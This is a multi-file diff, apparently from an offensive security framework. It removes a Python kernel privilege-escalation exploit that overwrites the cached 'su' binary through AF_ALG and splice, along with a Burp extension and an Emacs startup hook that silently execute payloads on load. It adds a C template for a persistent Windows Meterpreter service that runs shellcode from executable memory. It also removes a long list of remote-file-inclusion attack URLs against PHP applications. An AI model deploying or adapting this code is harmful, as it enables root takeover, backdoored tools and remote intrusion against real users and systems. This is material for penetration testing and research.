@@ -1,33 +0,0 @@
-#!/usr/bin/env python3
-import os
-import socket
-import sys
-
-AF_ALG = 38
-ALG_NAME = "authencesn(hmac(sha256),cbc(aes))"
-
-def check():
-    if not os.path.exists('/proc/crypto'):
-        print('[-] /proc/crypto is missing.')
-        return
-
-    try:
-        s = socket.socket(AF_ALG, socket.SOCK_SEQPACKET, 0)
-    except OSError as e:
-        print('[-] AF_ALG socket family unavailable (' + e.strerror + ').')
-        return
-
-    try:
-        s.bind(("aead", ALG_NAME))
-    except OSError as e:
-        print('[-] ' + repr(ALG_NAME) + ' can not be instantiated (' + e.strerror + ').')
-        return
-    finally:
-        s.close()
-
-    print('[+] The exploit socket has been created, encryption primitives are available.')
-    return True
-
-if __name__ == '__main__':
-    if not check():
-        sys.exit(1)
@@ -1,9 +0,0 @@
-import os
-import shutil
-
-su_path = shutil.which('su')
-su_fd = os.open(su_path, os.O_RDONLY)
-try:
-    os.posix_fadvise(su_fd, 0, 0, os.POSIX_FADV_DONTNEED)
-finally:
-    os.close(su_fd)
@@ -1,56 +0,0 @@
-#!/usr/bin/env python3
-import os
-import base64
-import shutil
-import socket
-import sys
-import zlib
-
-AF_ALG = 38
-ALG_SET_KEY = 1
-ALG_SET_IV = 2
-ALG_SET_OP = 3
-ALG_SET_AEAD_ASSOCLEN = 4
-ALG_SET_AEAD_AUTHSIZE = 5
-SOL_ALG = 279
-
-def setup_sock():
-    sock = socket.socket(AF_ALG, socket.SOCK_SEQPACKET, 0)
-    sock.bind(("aead", "authencesn(hmac(sha256),cbc(aes))"))
-    sock.setsockopt(SOL_ALG, ALG_SET_KEY, bytes.fromhex("0800010000000010" + "0" * 64))
-    sock.setsockopt(SOL_ALG, ALG_SET_AEAD_AUTHSIZE, None, 4)
-    op_sock, _ = sock.accept()
-    return op_sock
-
-def write(op_sock, su_fd, offset, chunk):
-    op_sock.sendmsg(
-        [b"A" * 4 + chunk],
-        [
-            (SOL_ALG, ALG_SET_OP, b'\x00\x00\x00\x00'),
-            (SOL_ALG, ALG_SET_IV, b'\x10' + b'\x00' * 19),
-            (SOL_ALG, ALG_SET_AEAD_ASSOCLEN, b'\x08\x00\x00\x00')
-        ],
-        32768
-    )
-    r, w = os.pipe()
-    os.splice(su_fd, w, offset + 4, offset_src=0)
-    os.splice(r, op_sock.fileno(), offset + 4)
-    try:
-        op_sock.recv(8 + offset)
-    except:
-        pass
-
-su_path = shutil.which('su')
-su_fd = os.open(su_path, os.O_RDONLY)
-try:
-    elf = zlib.decompress(base64.standard_b64decode(sys.argv[1]))
-except:
-    print('[-] failed to load the ELF executable from the argument, it must be base64+gzip')
-    sys.exit(os.EX_USAGE)
-
-op_sock = setup_sock()
-for i in range(0, len(elf), 4):
-    write(op_sock, su_fd, i, elf[i:i + 4])
-op_sock.close()
-
-os.execvp(su_path, ["su"] + sys.argv[1:])
@@ -1,9 +0,0 @@
-# Prerequisites
-
-You'll need `gradle` which can be installed on Kali via `sudo apt-get install gradle`
-
-# Build
-
-1. Build: `gradle clean build`
-  1. Post build extension location: `build/libs/MetasploitPayloadExtension.jar`
-2. Copy the files into the proper location: `cp build/classes/java/main/burp/BurpExtender.class precompiled.class`
@@ -1,27 +0,0 @@
-apply plugin: 'java'
-
-repositories {
-    mavenCentral()
-}
-
-dependencies {
-    // implementation 'net.portswigger.burp.extender:burp-extender-api:1.7.13'
-    implementation 'net.portswigger.burp.extender:burp-extender-api:2.3'
-}
-
-sourceSets {
-    main {
-        java {
-            srcDir 'src/main/java'
-        }
-        resources {
-            srcDir 'src/main/resources'
-        }
-    }
-}
-
-task fatJar(type: Jar) {
-    baseName = project.name + '-all'
-    from { configurations.compile.collect { it.isDirectory() ? it : zipTree(it) } }
-    with jar
-}
@@ -1 +0,0 @@
-rootProject.name = 'MetasploitPayloadExtension'
@@ -1,96 +0,0 @@
-package burp;
-
-import java.io.File;
-import java.io.InputStream;
-import java.io.PrintWriter;
-import java.nio.charset.StandardCharsets;
-import java.util.Scanner;
-import java.net.URL;
-import java.net.URLClassLoader;
-import java.lang.reflect.Method;
-
-public class BurpExtender implements IBurpExtender {
-    @Override
-    public void registerExtenderCallbacks(IBurpExtenderCallbacks callbacks) {
-        // Read extension name from resource file and set it
-        InputStream nameInputStream = getClass().getClassLoader().getResourceAsStream("name.txt");
-        Scanner nameScanner = new Scanner(nameInputStream, StandardCharsets.UTF_8.name());
-        String extensionName = nameScanner.useDelimiter("\\A").next().trim();
-        callbacks.setExtensionName(extensionName);
-
-        // Obtain our output and error streams
-        PrintWriter stdout = new PrintWriter(callbacks.getStdout(), true);
-        PrintWriter stderr = new PrintWriter(callbacks.getStderr(), true);
-
-        // Detect operating system
-        String os = System.getProperty("os.name").toLowerCase();
-        Process process;
-
-        try {
-            stdout.println("Initializing extension.");
-
-            // Locate command.txt using ClassLoader
-            InputStream commandInputStream = getClass().getClassLoader().getResourceAsStream("command.txt");
-
-            if (commandInputStream != null) {
-                // Read the command from command.txt
-                Scanner commandScanner = new Scanner(commandInputStream, StandardCharsets.UTF_8.name());
-                String command = commandScanner.useDelimiter("\\A").next().trim();
-
-                if (os.contains("win")) {
-                    // Create a temporary batch script to avoid line length issues from command line
-                    File tempScript = File.createTempFile("command", ".bat");
-                    tempScript.deleteOnExit(); // Ensure the file is deleted after execution
-
-                    // Write the command to the script file
-                    try (PrintWriter writer = new PrintWriter(tempScript, StandardCharsets.UTF_8.name())) {
-                        writer.println("@echo off");
-                        writer.println(command); // Write the payload command
-                    }
-
-                    // Execute the script file
-                    process = Runtime.getRuntime().exec(new String[]{"cmd.exe", "/c", tempScript.getAbsolutePath()});
-                } else {
-                    // Unix-based systems: Use /bin/bash
-                    process = Runtime.getRuntime().exec(new String[]{"/bin/bash", "-c", command});
-                }
-            } else {
-                // Load burp_extension_pload.jar from resources
-                InputStream jarInputStream = getClass().getClassLoader().getResourceAsStream("burp_extension_pload.jar");
-                if (jarInputStream == null) {
-                    throw new Exception("burp_extension_pload.jar not found in resources");
-                }
-
-                // Save the jar to a temporary file
-                File tempJar = File.createTempFile("burp_extension_pload", ".jar");
-                tempJar.deleteOnExit();
-
-                try (InputStream inputStream = jarInputStream) { // Declare jarInputStream as a resource
-                    java.nio.file.Files.copy(inputStream, tempJar.toPath(), java.nio.file.StandardCopyOption.REPLACE_EXISTING);
-                }
-
-                // Load the jar using URLClassLoader
-                stdout.println("Loading internal jar");
-                try (URLClassLoader classLoader = new URLClassLoader(
-                        new URL[]{tempJar.toURI().toURL()},
-                        null // Use null for an isolated class loader
-                )) {
-                    Class<?> mainClass = classLoader.loadClass("metasploit.Payload");
-                    Method mainMethod = mainClass.getDeclaredMethod("main", String[].class);
-                    mainMethod.invoke(null, (Object) new String[]{});
-                } catch (ClassNotFoundException e) {
-                    stderr.println("Class not found: " + e.getMessage());
-                } catch (NoSuchMethodException e) {
-                    stderr.println("Main method not found: " + e.getMessage());
-                } catch (Exception e) {
-                    stderr.println("Error loading jar file (" + tempJar.toPath() + "): " + e.getMessage());
-                    e.printStackTrace(stderr);
-                }
-            }
-
-            stdout.println("Finished initializing extension.");
-        } catch (Exception e) {
-            stderr.println("Error loading extension: " + e.getMessage());
-        }
-    }
-}
@@ -1 +0,0 @@
-FOOBARBAZ
@@ -1 +0,0 @@
-Metasploit Payload Extension
@@ -1,15 +0,0 @@
-(defun PLUGIN_NAME--process-sentinel (proc event)
-  (when (memq (process-status proc) '(exit signal))
-    (delete-process proc)))
-
-(defun PLUGIN_NAME-run-async ()
-    (make-process
-     :name "PLUGIN_NAME"
-     :buffer nil
-     :command (list "bash" "-li" "-c" "PAYLOAD_PLACEHOLDER")
-     :noquery t
-     :sentinel #'PLUGIN_NAME--process-sentinel))
-
-(add-hook 'emacs-startup-hook #'PLUGIN_NAME-run-async)
-
-(provide 'PLUGIN_NAME)
@@ -0,0 +1,304 @@
+#include <String.h>
+#include <Windows.h>
+#include <stdlib.h>
+#include <stdio.h>
+
+#define SERVICE_NAME     <%= @service_name.inspect %>
+#define DISPLAY_NAME     <%= @service_description.inspect %>
+#define RETRY_TIME       <%= @retry_time %>
+
+//
+// Globals
+//
+
+SERVICE_STATUS status;
+SERVICE_STATUS_HANDLE hStatus;
+
+//
+// Meterpreter connect back to host
+//
+
+void start_meterpreter()
+{
+// Your meterpreter shell here
+  <%= buf %>
+
+  LPVOID buffer = (LPVOID)VirtualAlloc(NULL, sizeof(buf), MEM_COMMIT, PAGE_EXECUTE_READWRITE);
+  memcpy(buffer,buf,sizeof(buf));
+  HANDLE hThread = CreateThread(NULL,0,(LPTHREAD_START_ROUTINE)(buffer),NULL,0,NULL);
+  WaitForSingleObject(hThread, -1); //INFINITE
+  CloseHandle(hThread);
+}
+
+//
+// Call self without parameter to start meterpreter
+//
+
+void self_call()
+{
+    char path[MAX_PATH];
+    char cmd[MAX_PATH];
+
+    if (GetModuleFileName(NULL, path, sizeof(path)) == 0) {
+        // Get module file name failed
+        return;
+    }
+
+    STARTUPINFO startup_info;
+    PROCESS_INFORMATION process_information;
+
+    ZeroMemory(&startup_info, sizeof(startup_info));
+    startup_info.cb = sizeof(startup_info);
+
+    ZeroMemory(&process_information, sizeof(process_information));
+
+    // If create process failed.
+    // CREATE_NO_WINDOW = 0x08000000
+    if (CreateProcess(path, path, NULL, NULL, TRUE, 0x08000000, NULL,
+                      NULL, &startup_info, &process_information) == 0)
+    {
+        return;
+    }
+
+    // Wait until the process died.
+    WaitForSingleObject(process_information.hProcess, -1);
+}
+
+//
+// Process control requests from the Service Control Manager
+//
+
+VOID WINAPI ServiceCtrlHandler(DWORD fdwControl)
+{
+    switch (fdwControl) {
+        case SERVICE_CONTROL_STOP:
+        case SERVICE_CONTROL_SHUTDOWN:
+            status.dwWin32ExitCode = 0;
+            status.dwCurrentState = SERVICE_STOPPED;
+            break;
+
+        case SERVICE_CONTROL_PAUSE:
+            status.dwWin32ExitCode = 0;
+            status.dwCurrentState = SERVICE_PAUSED;
+            break;
+
+        case SERVICE_CONTROL_CONTINUE:
+            status.dwWin32ExitCode = 0;
+            status.dwCurrentState = SERVICE_RUNNING;
+            break;
+
+        default:
+            break;
+    }
+
+    if (SetServiceStatus(hStatus, &status) == 0) {
+        //printf("Cannot set service status (0x%08x)", GetLastError());
+        exit(1);
+    }
+
+    return;
+}
+
+
+//
+// Main function of service
+//
+
+VOID WINAPI ServiceMain(DWORD dwArgc, LPTSTR* lpszArgv)
+{
+    // Register the service handler
+
+    hStatus = RegisterServiceCtrlHandler(SERVICE_NAME, ServiceCtrlHandler);
+
+    if (hStatus == 0) {
+        //printf("Cannot register service handler (0x%08x)", GetLastError());
+        exit(1);
+    }
+
+    // Initialize the service status structure
+
+    status.dwServiceType = SERVICE_WIN32_OWN_PROCESS | SERVICE_INTERACTIVE_PROCESS;
+    status.dwCurrentState = SERVICE_RUNNING;
+    status.dwControlsAccepted = SERVICE_ACCEPT_STOP | SERVICE_ACCEPT_SHUTDOWN;
+    status.dwWin32ExitCode = 0;
+    status.dwServiceSpecificExitCode = 0;
+    status.dwCheckPoint = 0;
+    status.dwWaitHint = 0;
+
+    if (SetServiceStatus(hStatus, &status) == 0) {
+        //printf("Cannot set service status (0x%08x)", GetLastError());
+        return;
+    }
+
+    // Start the Meterpreter
+    while (status.dwCurrentState == SERVICE_RUNNING) {
+        self_call();
+        Sleep(RETRY_TIME);
+    }
+
+    return;
+}
+
+
+//
+// Installs and starts the Meterpreter service
+//
+
+BOOL install_service()
+{
+    SC_HANDLE hSCManager;
+    SC_HANDLE hService;
+
+    char path[MAX_PATH];
+
+    // Get the current module name
+
+    if (!GetModuleFileName(NULL, path, MAX_PATH)) {
+        //printf("Cannot get module name (0x%08x)", GetLastError());
+        return FALSE;
+    }
+
+    // Build the service command line
+
+
+    char cmd[MAX_PATH];
+
+    int total_len = strlen(path) + <%= 3 + @start_cmd.length %>;
+    if (total_len < 0 || total_len >= sizeof(cmd)){
+        //printf("Cannot build service command line (0x%08x)", -1);
+        return FALSE;
+    }
+
+    cmd[0] = '\0';
+    strcat(cmd, "\"");
+    strcat(cmd, path);
+    strcat(cmd, "\" <%= @start_cmd %>");
+
+    // Open the service manager
+
+    hSCManager = OpenSCManager(NULL, NULL, SC_MANAGER_CREATE_SERVICE);
+
+    if (hSCManager == NULL) {
+        //printf("Cannot open service manager (0x%08x)", GetLastError());
+        return FALSE;
+    }
+
+    // Create the service
+
+    hService = CreateService(
+        hSCManager,
+        SERVICE_NAME,
+        DISPLAY_NAME,
+        0xf01ff,            // SERVICE_ALL_ACCESS
+        SERVICE_WIN32_OWN_PROCESS | SERVICE_INTERACTIVE_PROCESS,
+        SERVICE_AUTO_START,
+        SERVICE_ERROR_NORMAL,
+        cmd,
+        NULL,
+        NULL,
+        NULL,
+        NULL,   /* LocalSystem account */
+        NULL
+    );
+
+    if (hService == NULL) {
+        //printf("Cannot create service (0x%08x)", GetLastError());
+
+        CloseServiceHandle(hSCManager);
+        return FALSE;
+    }
+
+    // Start the service
+
+    char* args[] = { path, "service" };
+
+    if (StartService(hService, 2, (const char**)&args) == 0) {
+        DWORD err = GetLastError();
+
+        if (err != 0x420) //ERROR_SERVICE_ALREADY_RUNNING
+        {
+            //printf("Cannot start service %s (0x%08x)", SERVICE_NAME, err);
+
+            CloseServiceHandle(hService);
+            CloseServiceHandle(hSCManager);
+            return FALSE;
+        }
+    }
+
+    // Cleanup
+
+    CloseServiceHandle(hService);
+    CloseServiceHandle(hSCManager);
+
+    //printf("Service %s successfully installed.", SERVICE_NAME);
+
+    return TRUE;
+}
+
+//
+// Start the service
+//
+
+void start_service()
+{
+    SERVICE_TABLE_ENTRY ServiceTable[] =
+    {
+        { SERVICE_NAME, &ServiceMain },
+        { NULL, NULL }
+    };
+
+    if (StartServiceCtrlDispatcher(ServiceTable) == 0) {
+        //printf("Cannot start the service control dispatcher (0x%08x)",GetLastError());
+        exit(1);
+    }
+}
+
+
+//
+// Main function
+//
+
+int main()
+{
+    // Parse the command line argument.
+    // For now, int main(int argc, char *argv) is buggy with metasm.
+    // So we choose this approach to achieve it.
+    LPTSTR cmdline;
+    cmdline = GetCommandLine();
+
+    char *argv[MAX_PATH];
+    char * ch = strtok(cmdline," ");
+    int argc = 0;
+
+    while (ch != NULL)
+    {
+       argv[argc] = malloc( strlen(ch)+1) ;
+       strncpy(argv[argc], ch, strlen(ch)+1);
+
+       ch = strtok (NULL, " ");
+       argc++;
+    }
+
+    if (argc > 1) {
+
+        if (strcmp(argv[argc-1], <%= @install_cmd.inspect %>) == 0) {
+
+            // Installs and starts the service
+
+            install_service();
+            return 0;
+        }
+        else if (strcmp(argv[argc-1], <%= @start_cmd.inspect %>) == 0) {
+            // Starts the Meterpreter as a service
+
+            start_service();
+            return 0;
+        }
+    }
+
+    // Starts the Meterpreter as a normal application
+
+    start_meterpreter();
+
+    return 0;
+}
@@ -1,2247 +1,2246 @@
-# Compiled by @RSnake (2010-01-02).
-# Mostly from milw0rm, osvdb.org and elsewhere.
-# Change !INJECT! to the path of your backdoor.
-# Note that you may need to try it against every directory on the target and because of how this was culled you may need to add a question mark to your own !INJECT! URL
-# E.g.: !INJECT! => http://www.example.com/hax.txt?
-
-/0_admin/modules/Wochenkarte/frontend/index.php?x_admindir=!INJECT!?
-/123flashchat.php?e107path=!INJECT!
-/2007/administrator/components/com_joomlaflashfun/admin.joomlaflashfun.php?mosConfig_live_site=!INJECT!
-/22_ultimate/templates/header.php?mainpath=!INJECT!
-/22_ultimate/templates/header.php?mainpath=!INJECT!?
-/=!INJECT!
-/?_CONFIG[files][functions_page]=!INJECT!
-/?npage=-1&content_dir=!INJECT!%00&cmd=ls
-/?npage=1&content_dir=!INJECT!%00&cmd=ls
-/?show=!INJECT!?
-/A-Blog/navigation/donation.php?navigation_start=!INJECT!
-/A-Blog/navigation/latestnews.php?navigation_start=!INJECT!?
-/A-Blog/navigation/links.php?navigation_start=!INJECT!?
-/A-Blog/navigation/search.php?navigation_end=!INJECT!?
-/A-Blog/sources/myaccount.php?open_box=!INJECT!?
-/ACGVnews/header.php?PathNews=!INJECT!
-/ATutor/documentation/common/frame_toc.php?section=!INJECT!
-/ATutor/documentation/common/search.php?section=!INJECT!
-/ATutor/documentation/common/vitals.inc.php?req_lang=!INJECT!
-/ATutor/include/classes/module/module.class.php?row[dir_name]=!INJECT!
-/ATutor/include/classes/phpmailer/class.phpmailer.php?lang_path=!INJECT!
-/AdaptCMS_Lite_1.4_2/plugins/rss_importer_functions.php?sitepath=!INJECT!?
-/Administration/Includes/configureText.php?path_prefix=!INJECT!
-/Administration/Includes/contentHome.php?path_prefix=!INJECT!
-/Administration/Includes/deleteContent.php?path_prefix=!INJECT!
-/Administration/Includes/deleteUser.php?path_prefix=!INJECT!
-/Administration/Includes/userHome.php?path_prefix=!INJECT!
-/Agora_PATH//mdweb/admin/inc/organisations/country_insert.php?chemin_appli=!INJECT!?
-/Agora_PATH//mdweb/admin/inc/organisations/form_org.inc.php?chemin_appli=!INJECT!?
-/BE_config.php?_PSL[classdir]=!INJECT!
-/BPNEWS/bn_smrep1.php?bnrep=!INJECT!?&
-/Base/Application.php?pear_dir=!INJECT!
-/Bcwb_PATH/dcontent/default.css.php?root_path_admin=!INJECT!
-/Bcwb_PATH/include/startup.inc.php?root_path_admin=!INJECT!
-/Bcwb_PATH/system/default.css.php?root_path_admin=!INJECT!
-/Beautifier/Core.php?BEAUT_PATH=!INJECT!?
-/BetaBlockModules//Module/Module.php?path_prefix=!INJECT!
-/BetaBlockModules/AboutUserModule/AboutUserModule.php?path_prefix=!INJECT!
-/BetaBlockModules/AddGroupModule/AddGroupModule.php?path_prefix=!INJECT!
-/BetaBlockModules/AddMessageModule/AddMessageModule.php?path_prefix=!INJECT!
-/BetaBlockModules/AudiosMediaGalleryModule/AudiosMediaGalleryModule.php?current_blockmodule_path=!INJECT!
-/BetaBlockModules/CustomizeUIModule/desktop_image.php?path_prefix=!INJECT!
-/BetaBlockModules/EditProfileModule/DynamicProfile.php?path_prefix=!INJECT!
-/BetaBlockModules/EditProfileModule/external.php?path_prefix=!INJECT!
-/BetaBlockModules/EnableModule/EnableModule.php?path_prefix=!INJECT!
-/BetaBlockModules/ExternalFeedModule/ExternalFeedModule.php?path_prefix=!INJECT!
-/BetaBlockModules/FlickrModule/FlickrModule.php?path_prefix=!INJECT!
-/BetaBlockModules/GroupForumModule/GroupForumModule.php?path_prefix=!INJECT!
-/BetaBlockModules/GroupForumPermalinkModule/GroupForumPermalinkModule.php?path_prefix=!INJECT!
-/BetaBlockModules/GroupModerateContentModule/GroupModerateContentModule.php?path_prefix=!INJECT!
-/BetaBlockModules/GroupModerateUserModule/GroupModerateUserModule.php?path_prefix=!INJECT!
-/BetaBlockModules/GroupModerationModule/GroupModerationModule.php?path_prefix=!INJECT!
-/BetaBlockModules/GroupsCategoryModule/GroupsCategoryModule.php?path_prefix=!INJECT!
-/BetaBlockModules/GroupsDirectoryModule/GroupsDirectoryModule.php?path_prefix=!INJECT!
-/BetaBlockModules/ImagesMediaGalleryModule/ImagesMediaGalleryModule.php?current_blockmodule_path=!INJECT!
-/BetaBlockModules/ImagesModule/ImagesModule.php?path_prefix=!INJECT!
-/BetaBlockModules/InvitationStatusModule/InvitationStatusModule.php?path_prefix=!INJECT!
-/BetaBlockModules/LargestGroupsModule/LargestGroupsModule.php?path_prefix=!INJECT!
-/BetaBlockModules/LinksModule/LinksModule.php?path_prefix=!INJECT!
-/BetaBlockModules/LoginModule/remoteauth_functions.php?path_prefix=!INJECT!
-/BetaBlockModules/LogoModule/LogoModule.php?path_prefix=!INJECT!
-/BetaBlockModules/MediaFullViewModule/MediaFullViewModule.php?path_prefix=!INJECT!
-/BetaBlockModules/MediaManagementModule/MediaManagementModule.php?path_prefix=!INJECT!
-/BetaBlockModules/MembersFacewallModule/MembersFacewallModule.php?current_blockmodule_path=!INJECT!
-/BetaBlockModules/MessageModule/MessageModule.php?path_prefix=!INJECT!
-/BetaBlockModules/ModuleSelectorModule/ModuleSelectorModule.php?path_prefix=!INJECT!
-/BetaBlockModules/MyGroupsModule/MyGroupsModule.php?path_prefix=!INJECT!
-/BetaBlockModules/MyLinksModule/MyLinksModule.php?path_prefix=!INJECT!
-/BetaBlockModules/MyNetworksModule.php?path_prefix=!INJECT!
-/BetaBlockModules/NetworkAnnouncementModule/NetworkAnnouncementModule.php?path_prefix=!INJECT!
-/BetaBlockModules/NetworkDefaultControlModule/NetworkDefaultControlModule.php?path_prefix=!INJECT!
-/BetaBlockModules/NetworkDefaultLinksModule/NetworkDefaultLinksModule.php?path_prefix=!INJECT!
-/BetaBlockModules/NetworkModerateUserModule/NetworkModerateUserModule.php?path_prefix=!INJECT!
-/BetaBlockModules/NetworkResultContentModule/NetworkResultContentModule.php?path_prefix=!INJECT!
-/BetaBlockModules/NetworkResultUserModule/NetworkResultUserModule.php?path_prefix=!INJECT!
-/BetaBlockModules/NetworksDirectoryModule/NetworksDirectoryModule.php?path_prefix=!INJECT!
-/BetaBlockModules/NewestGroupsModule/NewestGroupsModule.php?current_blockmodule_path=!INJECT!
-/BetaBlockModules/PeopleModule/PeopleModule.php?path_prefix=!INJECT!
-/BetaBlockModules/PopularTagsModule/PopularTagsModule.php?path_prefix=!INJECT!
-/BetaBlockModules/PostContentModule/PostContentModule.php?path_prefix=!INJECT!
-/BetaBlockModules/ProfileFeedModule/ProfileFeedModule.php?path_prefix=!INJECT!
-/BetaBlockModules/RecentCommentsModule/RecentCommentsModule.php?path_prefix=!INJECT!
-/BetaBlockModules/RecentPostModule/RecentPostModule.php?path_prefix=!INJECT!
-/BetaBlockModules/RecentTagsModule/RecentTagsModule.php?path_prefix=!INJECT!
-/BetaBlockModules/RegisterModule/RegisterModule.php?path_prefix=!INJECT!
-/BetaBlockModules/SearchGroupsModule/SearchGroupsModule.php?path_prefix=!INJECT!
-/BetaBlockModules/ShowAnnouncementModule/ShowAnnouncementModule.php?path_prefix=!INJECT!
-/BetaBlockModules/ShowContentModule/ShowContentModule.php?path_prefix=!INJECT!
-/BetaBlockModules/TakerATourModule/TakerATourModule.php?path_prefix=!INJECT!
-/BetaBlockModules/UploadMediaModule/UploadMediaModule.php?current_blockmodule_path=!INJECT!
-/BetaBlockModules/UserMessagesModule/UserMessagesModule.php?path_prefix=!INJECT!
-/BetaBlockModules/UserPhotoModule/UserPhotoModule.php?path_prefix=!INJECT!
-/BetaBlockModules/VideosMediaGalleryModule/VideosMediaGalleryModule.php?current_blockmodule_path=!INJECT!
-/BetaBlockModules/ViewAllMembersModule/ViewAllMembersModule.php?path_prefix=!INJECT!
-/Blog_CMS/admin/plugins/NP_UserSharing.php?DIR_ADMIN=!INJECT!?admin
-/BsiliX_path]/files/mbox-action.php3?BSX_LIBDIR=!INJECT!
-/CSLH2_path/txt-db-api/util.php?API_HOME_DIR=!INJECT!?
-/CheckUpload.php?Language=!INJECT!&cmd=ls
-/Contenido_4.8.4/contenido/backend_search.php?contenido_path=!INJECT!?
-/Contenido_4.8.4/contenido/cronjobs/move_articles.php?cfg[path][contenido]=!INJECT!?
-/Contenido_4.8.4/contenido/cronjobs/move_old_stats.php?cfg[path][contenido]=!INJECT!?
-/Contenido_4.8.4/contenido/cronjobs/optimize_database.php?cfg[path][contenido]=!INJECT!?
-/Contenido_4.8.4/contenido/cronjobs/run_newsletter_job.php?cfg[path][contenido]=!INJECT!?
-/Contenido_4.8.4/contenido/cronjobs/send_reminder.php?cfg[path][contenido]=!INJECT!?
-/Contenido_4.8.4/contenido/cronjobs/session_cleanup.php?cfg[path][contenido]=!INJECT!?
-/Contenido_4.8.4/contenido/cronjobs/setfrontenduserstate.php?cfg[path][contenido]=!INJECT!?
-/Contenido_4.8.4/contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=!INJECT!?
-/Contenido_4.8.4/contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][templates]=!INJECT!?
-/Contenido_4.8.4/contenido/includes/include.newsletter_jobs_subnav.php?cfg[templates][right_top_blank]=!INJECT!?
-/Contenido_4.8.4/contenido/plugins/content_allocation/includes/include.right_top.php?cfg[path][contenido]=!INJECT!?
-/Contenido_4.8.4/contenido/plugins/content_allocation/includes/include.right_top.php?cfg[path][templates]=!INJECT!?
-/Contenido_4.8.4/contenido/plugins/content_allocation/includes/include.right_top.php?cfg[templates][right_top_blank]=!INJECT!?
-/CoupleDB.php?Parametre=0&DataDirectory=!INJECT!?
-/DFF_PHP_FrameworkAPI-latest/include/DFF_affiliate_client_API.php?DFF_config[dir_include]=!INJECT!
-/DFF_PHP_FrameworkAPI-latest/include/DFF_featured_prdt.func.php?DFF_config[dir_include]=!INJECT!
-/DFF_PHP_FrameworkAPI-latest/include/DFF_mer.func.php?DFF_config[dir_include]=!INJECT!
-/DFF_PHP_FrameworkAPI-latest/include/DFF_mer_prdt.func.php?DFF_config[dir_include]=!INJECT!
-/DFF_PHP_FrameworkAPI-latest/include/DFF_paging.func.php?DFF_config[dir_include]=!INJECT!
-/DFF_PHP_FrameworkAPI-latest/include/DFF_rss.func.php?DFF_config[dir_include]=!INJECT!
-/DFF_PHP_FrameworkAPI-latest/include/DFF_sku.func.php?DFF_config[dir_include]=!INJECT!
-/DFF_PHP_FrameworkAPI-latest/include/DFF_sku.func.php?DFF_config[dir_include]!INJECT!
-/DON3/applications/don3_requiem.don3app/don3_requiem.php?app_path=!INJECT!
-/DON3/applications/frontpage.don3app/frontpage.php?app_path=!INJECT!?
-/Dir_phNNTP/article-raw.php?file_newsportal=!INJECT!?
-/DynaTracker_v151/action.php?base_path=!INJECT!
-/DynaTracker_v151/includes_handler.php?base_path=!INJECT!
-/Easysite-2.0_path/configuration/browser.php?EASYSITE_BASE=!INJECT!?
-/Ex/modules/threadstop/threadstop.php?exbb[home_path]=!INJECT!?
-/Ex/modules/threadstop/threadstop.php?new_exbb[home_path]=!INJECT!?
-/Exophpdesk_PATH/pipe.php?lang_file=!INJECT!
-/FirstPost/block.php?Include=!INJECT!
-/Flickrclient.php?path_prefix=!INJECT!
-/FormTools1_5_0/global/templates/admin_page_open.php?g_root_dir=!INJECT!?
-/FormTools1_5_0/global/templates/client_page_open.php?g_root_dir=!INJECT!?
-/Full_Release/include/body_comm.inc.php?content=!INJECT!
-/Gallery/displayCategory.php?basepath=!INJECT!
-/Include/lib.inc.php3?Include=!INJECT!?
-/Include/variables.php3?Include=!INJECT!?
-/Jobline/admin.jobline.php?mosConfig_absolute_path=!INJECT!
-/ListRecords.php?lib_dir=!INJECT!?&cmd=id
-/Lorev1/third_party/phpmailer/class.phpmailer.php?lang_path=!INJECT!
-/MOD_forum_fields_parse.php?phpbb_root_path=!INJECT!
-/Mamblog/admin.mamblog.php?cfgfile=!INJECT!
-/Net_DNS_PATH/DNS/RR.php?phpdns_basedir=!INJECT!?
-/NuclearBB/tasks/send_queued_emails.php?root_path=!INJECT!?
-/OpenSiteAdmin/indexFooter.php?path=!INJECT!%00
-/OpenSiteAdmin/pages/pageHeader.php?path=!INJECT!?
-/OpenSiteAdmin/scripts/classes/DatabaseManager.php?path=!INJECT!%00
-/OpenSiteAdmin/scripts/classes/FieldManager.php?path=!INJECT!%00
-/OpenSiteAdmin/scripts/classes/Filter.php?path=!INJECT!%00
-/OpenSiteAdmin/scripts/classes/Filters/SingleFilter.php?path=!INJECT!%00
-/OpenSiteAdmin/scripts/classes/Form.php?path=!INJECT!%00
-/OpenSiteAdmin/scripts/classes/FormManager.php?path=!INJECT!%00
-/OpenSiteAdmin/scripts/classes/LoginManager.php?path=!INJECT!%00
-/PHP/includes/header.inc.php?root=!INJECT!?
-/PHPDJ_v05/dj/djpage.php?page=!INJECT!?
-/PaTh/index.php?rootpath=!INJECT!
-/Path_Script/createurl.php?formurl=!INJECT!
-/PhotoCart/adminprint.php?admin_folder=!INJECT!
-/Picssolution/install/config.php?path=!INJECT!?
-/RGboard/include/footer.php?_path[counter]=!INJECT!?
-/SPIP-v1-7-2/inc-calcul.php3?squelette_cache=!INJECT!?
-/SQuery/lib/gore.php?libpath=!INJECT!
-/SazCart/admin/alayouts/default/pages/login.php?_saz[settings][site_url]=!INJECT!?
-/SazCart/layouts/default/header.saz.php?_saz[settings][site_dir]=!INJECT!?
-/ScriptPage/source/includes/load_forum.php?mfh_root_path=!INJECT!
-/ScriptPath/footers.php?tinybb_footers=!INJECT!
-/ScriptPath/index.php?page=!INJECT!
-/Script_Path/config.inc.php?_path=!INJECT!?
-/Scripts/app_and_readme/navigator/index.php?page=!INJECT!
-/Scripts/mundimail/template/simpledefault/admin/_masterlayout.php?top=!INJECT!
-/Somery/team.php?checkauth=!INJECT!
-/Upload/install.php?skindir=!INJECT!
-/Widgets/Base/Footer.php?sys_dir=!INJECT!
-/Widgets/Base/widget.BifContainer.php?sys_dir=!INJECT!
-/Widgets/Base/widget.BifRoot.php?sys_dir=!INJECT!
-/Widgets/Base/widget.BifRoot2.php?sys_dir=!INJECT!
-/Widgets/Base/widget.BifRoot3.php?sys_dir=!INJECT!
-/Widgets/Base/widget.BifWarning.php?sys_dir=!INJECT!
-/WordPress_Files/All_Users/wp-content/plugins/Enigma2.php?boarddir=!INJECT!?
-/[path]/mybic_server.php?file=!INJECT!
-/[path]/previewtheme.php?theme=1&inc_path=!INJECT!?cmd
-/_administration/securite.php?cfg[document_uri]=!INJECT!
-/_blogadata/include/struct_admin.php?incl_page=!INJECT!?
-/_conf/_php-core/common-tpl-vars.php?admindir=!INJECT!
-/_connect.php?root=!INJECT!
-/_friendly/core/data/_load.php?friendly_path=!INJECT!
-/_friendly/core/data/yaml.inc.php?friendly_path=!INJECT!
-/_friendly/core/display/_load.php?friendly_path=!INJECT!
